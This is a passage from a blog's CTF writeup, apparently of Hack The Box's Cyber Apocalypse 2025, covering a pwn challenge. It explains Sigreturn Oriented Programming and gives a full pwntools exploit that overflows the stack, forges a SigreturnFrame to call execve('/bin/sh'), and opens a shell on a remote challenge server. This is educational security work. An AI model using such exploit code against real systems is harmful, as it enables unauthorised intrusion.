480w,\n/static/1cdb5bf40d2b3ab7d9bc8177d9738eca/e46b2/image-20250324190144622.webp 960w,\n/static/1cdb5bf40d2b3ab7d9bc8177d9738eca/c681e/image-20250324190144622.webp 1258w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/1cdb5bf40d2b3ab7d9bc8177d9738eca/8ff5a/image-20250324190144622.png 240w,\n/static/1cdb5bf40d2b3ab7d9bc8177d9738eca/e85cb/image-20250324190144622.png 480w,\n/static/1cdb5bf40d2b3ab7d9bc8177d9738eca/d9199/image-20250324190144622.png 960w,\n/static/1cdb5bf40d2b3ab7d9bc8177d9738eca/afa26/image-20250324190144622.png 1258w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/1cdb5bf40d2b3ab7d9bc8177d9738eca/d9199/image-20250324190144622.png\"\n            alt=\"image-20250324190144622\"\n            title=\"image-20250324190144622\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This binary has a stack overflow vulnerability at the point where it receives input with <code class=\"language-text\">read</code>.</p>\n<p>It also contains the address of <code class=\"language-text\">/bin/sh\\x00</code> and a <code class=\"language-text\">pop rax ; ret</code> gadget, so it looked like it should be possible to get a shell somehow from there.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 605px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/df6ff4aaed7ec9cc3a081ea8f73192e5/90cbd/image-20250324185554105.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 39.583333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABiUlEQVQoz32R2ZKiQBBFCxEUEUE2ATc2kcVu0R57ev7/w84U0t0zDxPzcCOrIu49VZkphBAURU7btTzefxCGAZ7v0TQ1WZ6h6zqDZ9C+FCxX49nOaxb+BnsZMtWNb49QFIXqfOJ2v/L+8cCXsDiJeLleOFWlhKaoqvo0p2eB443BVVZhhTF2uMfYbD+BylAF1enM68uVj5+/CPyAJEm49XeauqFrO1zXfQaOlQS5I9Bt75jxDt9J8d0cfbYaoYZhkHYB1VtM/dhiBwZebFH2MVFukxRr9MX0aT6cBJudwNsIDN9n63pkukXtHKlMl/lMQ6jqRAYU1Pnwg4jtIZIBi6JNaK8pJ1nzYkdZZqw9HdNSsBzZmiKYyUdMKeOzqhN1bPlLeZpTlGciT6PJNPrGoi2XUnPeOo3YV5nNlti2w2Qy+bOIcXZfknTTxFpZXC4dt1svt57JOYZ0l5b+9oqmqSjDTxaCqSb+Dv9LQoZjDoc9URw94c56zTE9Pu9hGDLMefAFiXzc+j/wN6Lrv9mQcWJyAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/df6ff4aaed7ec9cc3a081ea8f73192e5/8ac56/image-20250324185554105.webp 240w,\n/static/df6ff4aaed7ec9cc3a081ea8f73192e5/d3be9/image-20250324185554105.webp 480w,\n/static/df6ff4aaed7ec9cc3a081ea8f73192e5/a9b84/image-20250324185554105.webp 605w\"\n              sizes=\"(max-width: 605px) 100vw, 605px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/df6ff4aaed7ec9cc3a081ea8f73192e5/8ff5a/image-20250324185554105.png 240w,\n/static/df6ff4aaed7ec9cc3a081ea8f73192e5/e85cb/image-20250324185554105.png 480w,\n/static/df6ff4aaed7ec9cc3a081ea8f73192e5/90cbd/image-20250324185554105.png 605w\"\n            sizes=\"(max-width: 605px) 100vw, 605px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/df6ff4aaed7ec9cc3a081ea8f73192e5/90cbd/image-20250324185554105.png\"\n            alt=\"image-20250324185554105\"\n            title=\"image-20250324185554105\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This time, because <code class=\"language-text\">rax</code> and <code class=\"language-text\">rsi</code> can be controlled arbitrarily, it looked possible to obtain a shell using <code class=\"language-text\">rt_sigreturn</code> with Sigreturn Oriented Programming. (I did not know it before, but apparently this is a classic technique.)</p>\n<p>Reference: <a href=\"https://www.aynakeya.com/articles/ctf/pwn-srop-power-of-sigreturn/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Pwn - Sigreturn Oriented Programming (SROP) Technique | Aynakeya’s Blog</a></p>\n<p>Reference: <a href=\"https://inaz2.hatenablog.com/entry/2014/07/30/021123\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Trying ASLR+DEP+RELRO bypass via Sigreturn Oriented Programming on x64 - Momoiro Technology</a></p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 946px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/7d02f02faaf1a86878edcbc55e8cd525/36c33/image-20250328231412469.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 35%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABHElEQVQoz5WR226DMBBEDQYqfMUQlVAgQICEPPT/P2+6615fWqkPo+NdWePZtah7g+Fe43I06OYew/XAuN7RLzuG5YZ+3vEybegu18h2mNH2U6wv6w3rtqLrzqibGsZoiDwrcBwPWGWxnho8nk84E7UqkWUSeZ4hz1gyknuZlO8kSToLIb4lZYppmZBQMZJupJVU/rz0Hxmnse0bGoq8NE1MuVceI9WeaK2BdZZo4YhaayRJ8rvhSPO35xZVqFAaAxcClHNwZFYUBUQikKbpl/40Y+3LjGme4utswHsp8pxIeyNyjynj3t57zM9+PD8VkdHwlcZtKSWPHChlqMPHOcB7j4qSeu+gKT3/Io+vtIKjHq+hpM/je0qpaPgG9mye3ygFq3IAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/7d02f02faaf1a86878edcbc55e8cd525/8ac56/image-20250328231412469.webp 240w,\n/static/7d02f02faaf1a86878edcbc55e8cd525/d3be9/image-20250328231412469.webp 480w,\n/static/7d02f02faaf1a86878edcbc55e8cd525/30833/image-20250328231412469.webp 946w\"\n              sizes=\"(max-width: 946px) 100vw, 946px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/7d02f02faaf1a86878edcbc55e8cd525/8ff5a/image-20250328231412469.png 240w,\n/static/7d02f02faaf1a86878edcbc55e8cd525/e85cb/image-20250328231412469.png 480w,\n/static/7d02f02faaf1a86878edcbc55e8cd525/36c33/image-20250328231412469.png 946w\"\n            sizes=\"(max-width: 946px) 100vw, 946px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/7d02f02faaf1a86878edcbc55e8cd525/36c33/image-20250328231412469.png\"\n            alt=\"image-20250328231412469\"\n            title=\"image-20250328231412469\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"about-sigreturn-oriented-programmingsrop\" style=\"position:relative;\"><a href=\"#about-sigreturn-oriented-programmingsrop\" aria-label=\"about sigreturn oriented programmingsrop permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>About Sigreturn Oriented Programming(SROP)</h3>\n<p>SROP is a technique that abuses <code class=\"language-text\">sigreturn</code>, which is used after a signal handler finishes to restore the stack and registers to the state before the interrupt occurred.</p>\n<p>When <code class=\"language-text\">sigreturn</code> is called, it restores the state using information called a Sigframe, which stores the stack and register values.</p>\n<p>Therefore, by calling <code class=\"language-text\">sigreturn</code> after embedding a forged Sigframe containing the register values you want to overwrite, you can set the registers to arbitrary values.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 832px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/219090f2fa5467630191ca073afc470a/ef6b9/image-20250328230608699.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 37.916666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABXklEQVQoz31Sy0rDQBTN57vXXUHq3o0uFBURBLUUpNASTJs+kjRt82ieTBJnJslxMjXaKnpgci/nPubc3FGKokCeZWCUgr0XQMkgPmCMIgxDeZI0FTYCIQRJEqOp2Udd11++UlY1SEFRUI6QvOPV2GJgBqC8wn/QnRi9qYtlQA6aKmVZIUxzkJxi7sboPKjo3A8RkZ2K5sKhHaG/2CLM6I7jHBf9CU7uhujpG8lVIq9pqqxWNlzHkaPsgzMmbZQkOL58wtH5Iwa6JTlK2d8jM1EYi6L1ZgPP9+F6PuYLA6Zpyv+nqiqs2QTb9RL6WINhmHCEAG08geO6uxphLcsSKisohmHAtm2Z1CIIAmQkk37DU8aln2U5fHFhWZaySdOghed5cmnKT+mt/NvRDbrPp+AV/wxCLK7A2UsX16Org/yDkffJNtAUzpwptNWbeAHfWwzSAOO1JmNplv5q2pwPBvpjEav5NoQAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/219090f2fa5467630191ca073afc470a/8ac56/image-20250328230608699.webp 240w,\n/static/219090f2fa5467630191ca073afc470a/d3be9/image-20250328230608699.webp 480w,\n/static/219090f2fa5467630191ca073afc470a/de44a/image-20250328230608699.webp 832w\"\n              sizes=\"(max-width: 832px) 100vw, 832px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/219090f2fa5467630191ca073afc470a/8ff5a/image-20250328230608699.png 240w,\n/static/219090f2fa5467630191ca073afc470a/e85cb/image-20250328230608699.png 480w,\n/static/219090f2fa5467630191ca073afc470a/ef6b9/image-20250328230608699.png 832w\"\n            sizes=\"(max-width: 832px) 100vw, 832px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/219090f2fa5467630191ca073afc470a/ef6b9/image-20250328230608699.png\"\n            alt=\"image-20250328230608699\"\n            title=\"image-20250328230608699\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Reference: <a href=\"https://www.aynakeya.com/articles/ctf/pwn-srop-power-of-sigreturn/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Pwn - Sigreturn Oriented Programming (SROP) Technique | Aynakeya’s Blog</a></p>\n<p>A forged Sigframe can be created with Pwntools as follows.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token comment\"># Srop</span>\nframe     <span class=\"token operator\">=</span> SigreturnFrame<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\nframe<span class=\"token punctuation\">.</span>rax <span class=\"token operator\">=</span> <span class=\"token number\">0x3b</span>            <span class=\"token comment\"># syscall number for execve</span>\nframe<span class=\"token punctuation\">.</span>rdi <span class=\"token operator\">=</span> binsh           <span class=\"token comment\"># pointer to /bin/sh</span>\nframe<span class=\"token punctuation\">.</span>rsi <span class=\"token operator\">=</span> <span class=\"token number\">0x0</span>             <span class=\"token comment\"># NULL</span>\nframe<span class=\"token punctuation\">.</span>rdx <span class=\"token operator\">=</span> <span class=\"token number\">0x0</span>             <span class=\"token comment\"># NULL</span>\nframe<span class=\"token punctuation\">.</span>rip <span class=\"token operator\">=</span> rop<span class=\"token punctuation\">.</span>syscall<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span></code></pre></div>\n<p>Using this, I was able to obtain the Flag for this challenge with the following solver.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\n<span class=\"token comment\"># Set context</span>\n<span class=\"token comment\"># context.log_level = \"debug\"</span>\ncontext<span class=\"token punctuation\">.</span>arch <span class=\"token operator\">=</span> <span class=\"token string\">\"amd64\"</span>\ncontext<span class=\"token punctuation\">.</span>endian <span class=\"token operator\">=</span> <span class=\"token string\">\"little\"</span>\ncontext<span class=\"token punctuation\">.</span>word_size <span class=\"token operator\">=</span> <span class=\"token number\">64</span>\ncontext<span class=\"token punctuation\">.</span>terminal <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span><span class=\"token string\">\"/mnt/c/Windows/system32/cmd.exe\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"/c\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"start\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"wt.exe\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"-w\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"0\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"sp\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"-s\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\".75\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"-d\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\".\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"wsl.exe\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'-d'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"Ubuntu\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"bash\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"-c\"</span><span class=\"token punctuation\">]</span>\n\n<span class=\"token comment\"># Set gdb script</span>\ngdbscript <span class=\"token operator\">=</span> <span class=\"token string-interpolation\"><span class=\"token string\">f\"\"\"\nb *0x43017\ncontinue\n\"\"\"</span></span>\n\n<span class=\"token comment\"># Set target</span>\nTARGET_PATH <span class=\"token operator\">=</span> <span class=\"token string\">\"./laconic\"</span>\nexe <span class=\"token operator\">=</span> ELF<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Run program</span>\nis_gdb <span class=\"token operator\">=</span> <span class=\"token boolean\">True</span>\nis_gdb <span class=\"token operator\">=</span> <span class=\"token boolean\">False</span>\n<span class=\"token keyword\">if</span> is_gdb<span class=\"token punctuation\">:</span>\n    target <span class=\"token operator\">=</span> gdb<span class=\"token punctuation\">.</span>debug<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">,</span> aslr<span class=\"token operator\">=</span><span class=\"token boolean\">False</span><span class=\"token punctuation\">,</span> gdbscript<span class=\"token operator\">=</span>gdbscript<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">else</span><span class=\"token punctuation\">:</span>\n    <span class=\"token comment\"># target = process(TARGET_PATH)</span>\n    target <span class=\"token operator\">=</span> remote<span class=\"token punctuation\">(</span><span class=\"token string\">\"83.136.253.184\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">51762</span><span class=\"token punctuation\">,</span> ssl<span class=\"token operator\">=</span><span class=\"token boolean\">False</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Exploit</span>\nbinsh <span class=\"token operator\">=</span> <span class=\"token number\">0x43238</span>\nframe     <span class=\"token operator\">=</span> SigreturnFrame<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\nframe<span class=\"token punctuation\">.</span>rax <span class=\"token operator\">=</span> <span class=\"token number\">0x3b</span>            <span class=\"token comment\"># syscall number for execve</span>\nframe<span class=\"token punctuation\">.</span>rdi <span class=\"token operator\">=</span> binsh           <span class=\"token comment\"># pointer to /bin/sh</span>\nframe<span class=\"token punctuation\">.</span>rsi <span class=\"token operator\">=</span> <span class=\"token number\">0x0</span>             <span class=\"token comment\"># NULL</span>\nframe<span class=\"token punctuation\">.</span>rdx <span class=\"token operator\">=</span> <span class=\"token number\">0x0</span>             <span class=\"token comment\"># NULL</span>\nframe<span class=\"token punctuation\">.</span>rip <span class=\"token operator\">=</span> <span class=\"token number\">0x43015</span>         <span class=\"token comment\"># ROP syscall</span>\n\npayload <span class=\"token operator\">=</span> flat<span class=\"token punctuation\">(</span>\n    <span class=\"token string\">b\"\\x00\"</span><span class=\"token operator\">*</span><span class=\"token number\">8</span><span class=\"token punctuation\">,</span>\n    <span class=\"token number\">0x43018</span><span class=\"token punctuation\">,</span>    <span class=\"token comment\"># pop rax ; ret</span>\n    <span class=\"token number\">0xf</span><span class=\"token punctuation\">,</span>        <span class=\"token comment\"># rt_sigreturn</span>\n    <span class=\"token number\">0x43015</span><span class=\"token punctuation\">,</span>    <span class=\"token comment\"># ROP syscall</span>\n    frame       <span class=\"token comment\"># SigreturnFrame</span>\n<span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Finish exploit</span>\ntarget<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>clean<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>HTB’s CTF had many interesting and educational challenges.</p>\n<p>I still have not finished reviewing the Hard challenges, so I plan to do the upsolve in a separate article.</p>","fields":{"slug":"/ctf-cyber-apocalypse-2025-en","tagSlugs":["/tag/rev-en/","/tag/pwn-en/","/tag/forensic-en/","/tag/english/"]},"frontmatter":{"date":"2025-03-28","description":"Cyber Apocalypse CTF 2025 Writeup","tags":["Rev (en)","Pwn (en)","Forensic (en)","English"],"title":"Cyber Apocalypse CTF 2025 Writeup","socialImage":{"publicURL":"/static/0b5efa022bd86cd055fd0688f9e8e95a/ctf-cyber-apocalypse-2025.png"}}}},"pageContext":{"slug":"/ctf-cyber-apocalypse-2025-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}